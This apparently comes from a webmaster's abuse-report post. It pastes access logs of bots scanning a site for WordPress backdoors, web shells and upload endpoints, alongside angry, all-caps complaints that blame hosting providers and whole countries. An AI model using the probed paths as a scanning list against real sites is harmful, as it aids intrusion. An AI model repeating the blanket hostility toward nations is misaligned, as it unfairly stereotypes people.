45.86.200.2 website*x.com – – [20/Sep/2025:23:32:18 +0200] „GET /wp-admin/chosen.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0“
45.86.200.2 website*x.com – – [20/Sep/2025:23:32:18 +0200] „GET /autoload_classmap/bypass.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3“
45.86.200.2 website*x.com – – [20/Sep/2025:23:32:18 +0200] „GET /dropdown.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95“
… and so on… and so on… VERY IGNORANT AND VERY UNSECURE PROVIDER!!!
+
45.86.200.16 website*x.com – – [20/Sep/2025:23:32:20 +0200] „GET /special.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36“
45.86.200.16 website*x.com – – [20/Sep/2025:23:32:20 +0200] „GET /assets/script.js.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
45.86.200.16 website*x.com – – [20/Sep/2025:23:32:20 +0200] „GET /wp-content/themes/twentytwentythree/patterns/index.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95“
45.86.200.16 website*x.com – – [20/Sep/2025:23:32:20 +0200] „GET /edit-tags.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36“
45.86.200.16 website*x.com – – [20/Sep/2025:23:32:20 +0200] „GET /wp-admin/css/colors/sunrise/colors_95.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95“
45.86.200.16 website*x.com – – [20/Sep/2025:23:32:20 +0200] „GET /wp-includes/block-patterns/autoload_classmap.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36“
… and so on… and so on… VERY IGNORANT AND VERY UNSECURE PROVIDER!!!
+
45.86.200.19 website*x.com – – [20/Sep/2025:23:32:22 +0200] „GET /wp-admin/maint/themes.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3“
45.86.200.19 website*x.com – – [20/Sep/2025:23:32:22 +0200] „GET /wp-content/plugins/seoplugins/index.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36“
45.86.200.19 website*x.com – – [20/Sep/2025:23:32:22 +0200] „GET /wp-includes/fonts/themes.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3“
45.86.200.19 website*x.com – – [20/Sep/2025:23:32:22 +0200] „GET /wp-content/themes/twentytwentytwo/assets/fonts/index.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3“
45.86.200.19 website*x.com – – [20/Sep/2025:23:32:22 +0200] „GET /wp-includes/certificates/index.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36“
45.86.200.19 website*x.com – – [20/Sep/2025:23:32:22 +0200] „GET /thumbs.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36“
45.86.200.19 website*x.com – – [20/Sep/2025:23:32:22 +0200] „GET /byp.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0“
45.86.200.19 website*x.com – – [20/Sep/2025:23:32:22 +0200] „GET /blog/wp-includes/about.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36“
… and so on… and so on… VERY IGNORANT AND VERY UNSECURE PROVIDER!!!
+
45.86.200.33 website*x.com – – [20/Sep/2025:23:32:24 +0200] „GET /assets/sandi-amir.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0“
45.86.200.33 website*x.com – – [20/Sep/2025:23:32:24 +0200] „GET /assets/images/admin.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95“
45.86.200.33 website*x.com – – [20/Sep/2025:23:32:24 +0200] „GET /wp-content/plugins/index.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36“
45.86.200.33 website*x.com – – [20/Sep/2025:23:32:24 +0200] „GET /js/wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0“
45.86.200.33 website*x.com – – [20/Sep/2025:23:32:24 +0200] „GET /simple/function.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0“
45.86.200.33 website*x.com – – [20/Sep/2025:23:32:24 +0200] „GET /worm.PhP HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36“
45.86.200.33 website*x.com – – [20/Sep/2025:23:32:24 +0200] „GET /ext.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36“
45.86.200.33 website*x.com – – [20/Sep/2025:23:32:24 +0200] „GET /delpaths.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (X11; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0“
45.86.200.33 website*x.com – – [20/Sep/2025:23:32:24 +0200] „GET /wp-includes/bk/index.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36“
45.86.200.33 website*x.com – – [20/Sep/2025:23:32:24 +0200] „GET /wp-content/plugins/wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3“
… and so on… and so on… VERY IGNORANT AND VERY UNSECURE PROVIDER!!!
+
45.86.200.41 website*x.com – – [20/Sep/2025:23:32:26 +0200] „GET /wp-content/themes/twentytwentyfour/system_cache.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0“
45.86.200.41 website*x.com – – [20/Sep/2025:23:32:26 +0200] „GET /wp-content/themes/sky-pro/js.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36“
45.86.200.41 website*x.com – – [20/Sep/2025:23:32:26 +0200] „GET /wp-includes/Text/wp-conflg.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3“
45.86.200.41 website*x.com – – [20/Sep/2025:23:32:26 +0200] „GET /wp-content/themes/pridmag/waf_defender.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0“
45.86.200.41 website*x.com – – [20/Sep/2025:23:32:26 +0200] „GET /theme.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36“
45.86.200.41 website*x.com – – [20/Sep/2025:23:32:26 +0200] „GET /wp-content/themes/twentytwentytwo/waf_defender.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0“
45.86.200.41 website*x.com – – [20/Sep/2025:23:32:26 +0200] „GET /wp-admin/css/colors/coffee/index.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36“
45.86.200.41 website*x.com – – [20/Sep/2025:23:32:26 +0200] „GET /Simple.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36“
… and so on… and so on… VERY IGNORANT AND VERY UNSECURE PROVIDER!!!
+
45.86.200.1 website*x.com – – [20/Sep/2025:23:32:28 +0200] „GET /wsad.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36“
45.86.200.1 website*x.com – – [20/Sep/2025:23:32:28 +0200] „GET /brutecp-3x-NETDRUG.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36“
45.86.200.1 website*x.com – – [20/Sep/2025:23:32:28 +0200] „GET /nation.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36“
45.86.200.1 website*x.com – – [20/Sep/2025:23:32:28 +0200] „GET /wh/glass.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36“
45.86.200.1 website*x.com – – [20/Sep/2025:23:32:28 +0200] „GET /live/i.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0“
45.86.200.1 website*x.com – – [20/Sep/2025:23:32:28 +0200] „GET /wp-includes/js/codemirror/index.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0“
45.86.200.1 website*x.com – – [20/Sep/2025:23:32:28 +0200] „GET /wp-includes/wp_class_datlib.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36“
45.86.200.1 website*x.com – – [20/Sep/2025:23:32:28 +0200] „GET /wp-includes/js/tinymce/langs/about.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3“
… and so on… and so on… VERY IGNORANT AND VERY UNSECURE PROVIDER!!!
+
45.86.200.9 website*x.com – – [20/Sep/2025:23:32:30 +0200] „GET /wp-includes/images/crystal/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0“
45.86.200.9 website*x.com – – [20/Sep/2025:23:32:30 +0200] „GET /wp-includes/images/media/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
45.86.200.9 website*x.com – – [20/Sep/2025:23:32:30 +0200] „GET /wp-includes/images/smilies/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0“
45.86.200.9 website*x.com – – [20/Sep/2025:23:32:30 +0200] „GET /wp-includes/images/wlw/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36“
45.86.200.9 website*x.com – – [20/Sep/2025:23:32:30 +0200] „GET /wp-includes/js/codemirror/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; rv:11.0) like Gecko“
45.86.200.9 website*x.com – – [20/Sep/2025:23:32:30 +0200] „GET /wp-includes/js/plupload/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0“
45.86.200.9 website*x.com – – [20/Sep/2025:23:32:30 +0200] „GET /wp-includes/PHPMailer/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0“
45.86.200.9 website*x.com – – [20/Sep/2025:23:32:30 +0200] „GET /wp-includes/sitemaps/providers/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36“
45.86.200.9 website*x.com – – [20/Sep/2025:23:32:30 +0200] „GET /cache-wordpress/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0“
… and so on… and so on… VERY IGNORANT AND VERY UNSECURE PROVIDER!!!

MAIL NR. 10 – Hacker-Idiots from SATURDAY!

anti-spam@chinatelecom.cn,qcloud_net_duty@tencent.com,tencent_idc@tencent.com,abuse@cheapy.host,abuse@kilinov.com

AS134756 – CHINANET Nanjing Jishan IDC network – AGAIN AND AGAIN EVERY DAY! – VERY UNWANTED AND UNSECURE PROVIDER!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
IRT-ACEVILLEPTELTD-SG – TENCENT
anti-spam@chinatelecom.cn – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT! – ABUSE PER EMAIL IS STANDARD!!!
DAILY REFERRER-SPAM S H I T TO THE UNWANTED WEBSITE gbnadvisors.com!!!
CHINA IS COMPLET UNWANTED AND COMPLETE BLOCKED! – TO MANY HACKER-IDIOTS EVERY DAY!!!
117.62.235.53 website*x.com – – [20/Sep/2025:15:48:37 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1“

AS401120 – cheapy.host LLC – VERY UNWANTED AND UNSECURE PROVIDER!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@cheapy.host – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
196.251.84.57 website*x.com – – [20/Sep/2025:19:49:13 +0200] „POST /wp-confiq.php HTTP/1.0“ 302 20 „www.google.com“ „Mozilla/6.4 (Windows NT 11.1) Gecko/2010102 Firefox/99.0“
196.251.84.57 website*x.com – – [20/Sep/2025:19:49:39 +0200] „POST /wp-confiq.php HTTP/1.0“ 302 20 „www.google.com“ „Mozilla/6.4 (Windows NT 11.1) Gecko/2010102 Firefox/99.0“
196.251.84.57 www.website*x.com – – [20/Sep/2025:19:50:04 +0200] „POST /wp-confiq.php HTTP/1.0“ 302 20 „www.google.com“ „Mozilla/6.4 (Windows NT 11.1) Gecko/2010102 Firefox/99.0“
196.251.84.57 www.website*x.com – – [20/Sep/2025:19:50:29 +0200] „POST /wp-confiq.php HTTP/1.0“ 302 20 „www.google.com“ „Mozilla/6.4 (Windows NT 11.1) Gecko/2010102 Firefox/99.0“

AS12695 – LLC Digital Network – VERY UNWANTED AND UNSECURE PROVIDER!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@kilinov.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
RUSSIA IS COMPLET UNWANTED AND COMPLETE BLOCKED! – TO MANY HACKER-IDIOTS EVERY DAY!!!
85.192.18.102 website*x.com – – [20/Sep/2025:18:34:01 +0200] „GET /index.php?module=users/login HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.1 Safari/605.1.15“
85.192.18.102 website*x.com – – [20/Sep/2025:18:34:02 +0200] „GET /solr/admin/cores?wt=json HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Debian; Linux i686; rv:122.0) Gecko/20100101 Firefox/122.0“
85.192.18.102 website*x.com – – [20/Sep/2025:18:34:02 +0200] „POST /dashboard/uploadID.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36“
85.192.18.102 website*x.com – – [20/Sep/2025:18:34:02 +0200] „POST /pandora_console/ajax.php?page=include/ajax/update_manager.ajax&upload_file=true HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15“
85.192.18.102 website*x.com – – [20/Sep/2025:18:34:02 +0200] „GET /index.php?module=users/login HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0“
85.192.18.102 website*x.com – – [20/Sep/2025:18:34:02 +0200] „GET /index.php?module=users/login HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36“
85.192.18.102 website*x.com – – [20/Sep/2025:18:34:02 +0200] „GET /index.php?app=main&inc=core_auth&route=login HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36“
85.192.18.102 website*x.com – – [20/Sep/2025:18:34:03 +0200] „GET /login HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux i686; rv:133.0) Gecko/20100101 Firefox/133.0“
… and so on… and so on…!!! VERY UNSECURE AND VERY UNWANTED PROVIDER!!!

MAIL NR. 11 – Hacker-Idiots from SATURDAY!

abuse@vdsina.ru,ip@biterika.ru,abuse@cheapy.host,antispam_zjnoc@163.com

AS35048 – Biterika Group LLC – BITERIKA IS ALSO VERY UNWANTED AND UNSECURE PROVIDER!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
HERE WITH 2 IP´S!!!
ip@biterika.ru – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
RUSSIA IS COMPLETE UNWANTED AND ALSO COMPLETE BLOCKED! – TO MANY HACKER-IDIOTS EVERY DAY!!!
HERE ARE WE HAVE A 403 BUT WHEN IT´S A 200, THIS HACKER-IDIOTS START TO TRY TO HACKING!!!
46.8.106.197 website*x.com – – [20/Sep/2025:19:48:36 +0200] „GET / HTTP/1.0“ 403 – „http://website*x.com/“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 CCleaner/130.0.0.0“
+
46.8.223.56 website*x.com – – [20/Sep/2025:19:48:36 +0200] „GET / HTTP/1.0“ 403 – „http://website*x.com/“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 CCleaner/130.0.0.0“
46.8.223.56 website*x.com – – [20/Sep/2025:19:48:36 +0200] „GET / HTTP/1.0“ 403 – „http://website*x.com/“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 CCleaner/130.0.0.0“

AS58461 – CT-HangZhou-IDC – VERY UNWANTED AND UNSECURE PROVIDER!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
antispam_zjnoc@163.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
CHINA IS COMPLETE UNWANTED AND ALSO COMPLETE BLOCKED! – TO MANY HACKER-IDIOTS EVERY DAY!!!
183.134.59.134 website*x.com – – [20/Sep/2025:23:54:08 +0200] „GET /favicon.ico HTTP/1.0“ 403 – „-“ „Dalvik/2.1.0 (Linux; U; Android 9.0; ZTE BA520 Build/MRA58K)“
183.134.59.134 website*x.com – – [20/Sep/2025:23:55:15 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux; Android 5.1; MX5 Build/LMY47I; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043220 Safari/537.36 MicroMessenger/6.5.8.1060 NetType/WIFI Language/zh_CN“
183.134.59.134 website*x.com – – [20/Sep/2025:23:55:40 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.2) Gecko/20021126“
183.134.59.134 website*x.com – – [20/Sep/2025:23:57:57 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11) AppleWebKit/601.1.27 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/601.1.27“
183.134.59.134 website*x.com – – [20/Sep/2025:23:58:49 +0200] „GET /mobile HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.2) Gecko/20021126“
183.134.59.134 website*x.com – – [20/Sep/2025:23:58:49 +0200] „GET /chatIndex HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.2) Gecko/20021126“
183.134.59.134 website*x.com – – [20/Sep/2025:23:58:50 +0200] „GET /index.html HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.2) Gecko/20021126“
183.134.59.134 website*x.com – – [20/Sep/2025:23:58:51 +0200] „GET /eapp_1014_172 HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.2) Gecko/20021126“
183.134.59.134 website*x.com – – [20/Sep/2025:23:58:52 +0200] „GET /jx.html HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.2) Gecko/20021126“

MAIL NR. 1 – Hacker-Idiots from FRIDAY AFTERNOON!

report@abuseradar.com,reports@magnates.co.za, abuse@hostuniversal.com.au,aamakhfudh@adisanggoro.sch.id,

AS214209 – Internet Magnate (Pty) Ltd – NOW VERY UNWANTED!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
report@abuseradar.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
89.213.174.251 website*x.com – – [19/Sep/2025:12:53:28 +0200] „GET /wp-editor.php HTTP/1.0“ 302 20 „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“

AS136557 – Host Universal Pty Ltd – VERY UNWANTED AND IGNORANT PROVIDER!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@hostuniversal.com.au – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
45.248.76.228 website*x.com – – [19/Sep/2025:14:19:28 +0200] „GET /wp-includes/id3/license.txt/xmlrpc.php?rsd HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
45.248.76.228 website*x.com – – [19/Sep/2025:14:19:28 +0200] „GET /wp-includes/id3/license.txt/blog/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
45.248.76.228 website*x.com – – [19/Sep/2025:14:19:29 +0200] „GET /wp-includes/id3/license.txt/web/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
45.248.76.228 website*x.com – – [19/Sep/2025:14:19:30 +0200] „GET /wp-includes/id3/license.txt/wordpress/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
45.248.76.228 website*x.com – – [19/Sep/2025:14:19:31 +0200] „GET /wp-includes/id3/license.txt/wp/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
45.248.76.228 website*x.com – – [19/Sep/2025:14:19:31 +0200] „GET /wp-includes/id3/license.txt/2020/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
45.248.76.228 website*x.com – – [19/Sep/2025:14:19:32 +0200] „GET /wp-includes/id3/license.txt/2019/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
45.248.76.228 website*x.com – – [19/Sep/2025:14:19:33 +0200] „GET /wp-includes/id3/license.txt/2021/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
45.248.76.228 website*x.com – – [19/Sep/2025:14:19:33 +0200] „GET /wp-includes/id3/license.txt/shop/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
45.248.76.228 website*x.com – – [19/Sep/2025:14:19:34 +0200] „GET /wp-includes/id3/license.txt/wp1/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
45.248.76.228 website*x.com – – [19/Sep/2025:14:19:35 +0200] „GET /wp-includes/id3/license.txt/test/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
45.248.76.228 website*x.com – – [19/Sep/2025:14:19:35 +0200] „GET /wp-includes/id3/license.txt/site/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
45.248.76.228 website*x.com – – [19/Sep/2025:14:19:36 +0200] „GET /wp-includes/id3/license.txt/cms/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“

